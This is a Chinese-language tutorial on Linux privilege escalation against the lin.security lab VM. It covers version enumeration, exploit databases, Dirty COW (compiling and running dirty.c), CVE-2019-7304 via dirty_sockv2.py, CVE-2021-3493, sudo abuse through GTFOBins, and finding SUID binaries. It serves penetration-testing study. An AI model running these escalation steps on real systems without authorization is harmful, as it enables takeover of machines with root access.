目录
版本信息收集
kali得一些exp网站
kali自带的searchsploit工具
脏牛提权漏洞(改写没有写权限的文件)
测试靶场下载链接
sudo提权
上传恶意C脚本进行编译生成dirty的elf文件,也可以在攻击机编译好上传
启动,123456是设置的密码
修改的攻击工作完成,成功降下cpu
攻击失败,多次尝试就行
本地提权
CVE-2019-7304
开始攻击
攻击成功
CVE-2021-3493
攻击成功
滥用的sudo权限
普通用户的sudo滥用提权
通过find搜索进行sudo提权
SUID提权
切换到普通用户更改文件时的root用户瞬间,因为有的普通用户文件属主为root,是配置不当导致的
SUID权限说明
找具有suid的权限的文件命令
和sudo滥用的方式一样,在网站找suid
提权成功
版本信息收集
# 查看发行版本
cat /etc/issue
cat /etc/*-release
lsb_release -a
# 查看内核版本
uname -a
uname -mrs
kali得一些exp网站
GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合https://github.com/SecWiki/linux-kernel-exploits
https://www.exploit-db.com/exploits/https://www.exploit-db.com/exploits/
kali自带的searchsploit工具
searchsploit privilege | grep -i linux | grep -i kernel
脏牛提权漏洞(改写没有写权限的文件)
测试靶场下载链接
https://in.security/downloads/lin.security_v1.0.ovahttps://in.security/downloads/lin.security_v1.0.ova
sudo提权
知道密码的情况
分配ip,ssh准备连接
dhclient #分配个ip
有ip了,可以连接ssh了
上传恶意C脚本进行编译生成dirty的elf文件,也可以在攻击机编译好上传
gcc -pthread dirty.c -o dirty -lcrypt
启动,123456是设置的密码
./dirty 123456
修改的攻击工作完成,成功降下cpu
攻击失败,多次尝试就行
本地提权
CVE-2019-7304
开始攻击
python3 dirty_sockv2.py
攻击成功
CVE-2021-3493
攻击成功
滥用的sudo权限
普通用户的sudo滥用提权
通过find搜索进行sudo提权
GTFOBinshttps://gtfobins.github.io/
SUID提权
切换到普通用户更改文件时的root用户瞬间,因为有的普通用户文件属主为root,是配置不当导致的
SUID权限说明
- 启动为进程之后,其进程的属主为原程序文件的属主
- 只能作用在二进制程序上,不能作用在脚本上,且设置在目录上无意义
- 执行suid权限的程序时,此用户将继承此程序的所有者权限
找具有suid的权限的文件命令
find / -perm -u=s -type f 2>/dev/null
和sudo滥用的方式一样,在网站找suid
GTFOBinshttps://gtfobins.github.io/